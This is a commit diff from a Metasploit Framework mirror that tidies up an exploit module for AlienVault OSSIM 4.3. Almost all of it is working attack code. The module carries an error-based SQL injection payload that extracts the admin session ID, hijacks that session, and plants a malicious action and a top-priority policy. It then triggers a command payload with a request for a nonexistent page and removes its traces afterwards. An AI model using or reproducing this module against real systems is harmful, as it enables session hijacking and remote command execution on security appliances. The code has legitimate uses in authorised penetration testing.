infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do module clean up

bug/bundler_fix
jvazquez-r7 2014-04-28 11:45:40 -05:00
parent 2e04bc9e4e
commit 245b591247
1 changed files with 92 additions and 90 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

182
modules/exploits/unix/webapp/alienvault_sqli_exec.rb
View File

@ -27,12 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['OSVDB', '106252'],
['EDB', '33006']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => ['unix'],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
@ -43,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Targets' =>
[
['Alienvault OSSIM', {}]
['Alienvault OSSIM 4.3', {}]
],
'Privileged' => true,
'DisclosureDate' => "Apr 28 2014",
'DisclosureDate' => "Apr 24 2014",
'DefaultTarget' => 0))
register_options(
@ -58,22 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote
def check
# Check version
vprint_status("#{peer} - Trying to detect vulnerable OSSIM")
marker = rand_text_alpha(6)
sqlirand = rand_text_numeric(4+rand(4))
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }
})
if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1
if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
return Exploit::CheckCode::Vulnerable
else
print_status("#{res.body}")
return Exploit::CheckCode::Safe
end
@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
marker = rand_text_alpha(6)
sqlirand = rand_text_numeric(4+rand(4))
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}"
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
print_status("#{peer} - Trying to grab admin session through SQLi")
@ -93,9 +93,9 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_get' => { 'date_from' => sqli }
})
if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/
adminsession = $1
@cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*")
if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
admin_session = $1
@cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
else
fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
@ -118,24 +118,26 @@ class Metasploit3 < Msf::Exploit::Remote
}
})
if res and res.code == 200
if res && res.code == 200
print_status("#{peer} - Created Action [ #{action} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
end
# Retrieving the Action ID, used to clean up the action after succesful exploitation
post_vars = "page=1&rp=2000"
# Retrieving the Action ID, used to clean up the action after successful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => @cookie,
'data' => post_vars
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/
@actionid = $1
print_status("#{peer} - Action ID is [ #{@actionid} ]")
if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
@action_id = $1
print_status("#{peer} - Action ID is [ #{@action_id} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
end
@ -143,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Retrieving the policy data, necessary for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"),
'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => @cookie,
'vars_get' => {
'm_opt' => 'configuration',
@ -152,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote
}
})
if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/
policyctx = $1
policygroup = $2
print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!")
if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policy_ctx = $1
policy_group = $2
print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
end
@ -169,8 +171,8 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_post' => {
'descr' => policy,
'active' => '1',
'group' => policygroup,
'ctx' => policyctx,
'group' => policy_group,
'ctx' => policy_ctx,
'order' => '1', # Makes this the first policy, overruling all the other policies
'action' => 'new',
'sources[]' => '00000000000000000000000000000000', # Source is ANY
@ -201,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
'end_day_week' => '7',
'end_day_month' => '31',
'end_month' => '12',
'actions[]' => @actionid,
'actions[]' => @action_id,
'sim' => '1',
'priority' => '1',
'qualify' => '1',
@ -211,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
})
if res and res.code == 200
if res && res.code == 200
print_status("#{peer} - Created Policy [ #{policy} ]")
else
fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
@ -223,23 +225,22 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'ctx' => policyctx,
'group' => policygroup
'ctx' => policy_ctx,
'group' => policy_group
},
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/
@policyid = $1
print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!")
if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
@policy_id = $1
print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
end
# Reload the policies to make our new policy active
policy = rand_text_alpha(8)
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
@ -251,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
})
if res and res.code == 200
if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
@ -259,15 +260,15 @@ class Metasploit3 < Msf::Exploit::Remote
# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
dontexist = rand_text_alpha(8+rand(4))
dont_exist = rand_text_alpha(8+rand(4))
print_status("#{peer} - Triggering policy and action by requesting a non existing url")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, dontexist),
'uri' => normalize_uri(target_uri.path, dont_exist),
'cookie' => @cookie
})
if res and res.code == 404
if res && res.code == 404
print_status("#{peer} - Payload delivered")
else
fail_with(Failure::Unknown, "#{peer} - Payload failed!")
@ -277,58 +278,59 @@ class Metasploit3 < Msf::Exploit::Remote
def cleanup
# Clean up, retrieve token so that the policy can be removed
print_status("#{peer} - Cleaning up")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'cookie' => @cookie,
'vars_post' => { 'f_name' => 'delete_policy' }
})
begin
# Clean up, retrieve token so that the policy can be removed
print_status("#{peer} - Cleaning up")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'cookie' => @cookie,
'vars_post' => { 'f_name' => 'delete_policy' }
})
if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
print_warning("#{peer} - Unable to retrieve token")
if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
print_warning("#{peer} - Unable to retrieve token")
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policy_id,
'token' => token
}
})
if res && res.code == 200
print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @action_id,
}
})
if res && res.code == 200
print_status("#{peer} - Action ID [ #{@action_id} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
ensure
super # mixins should be able to cleanup even in case of Exception
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policyid,
'token' => token
}
})
if res and res.code == 200
token = $1
print_status("#{peer} - Policy ID [ #{@policyid} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @actionid,
}
})
if res and res.code == 200
token = $1
print_status("#{peer} - Action ID [ #{@actionid} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
end
end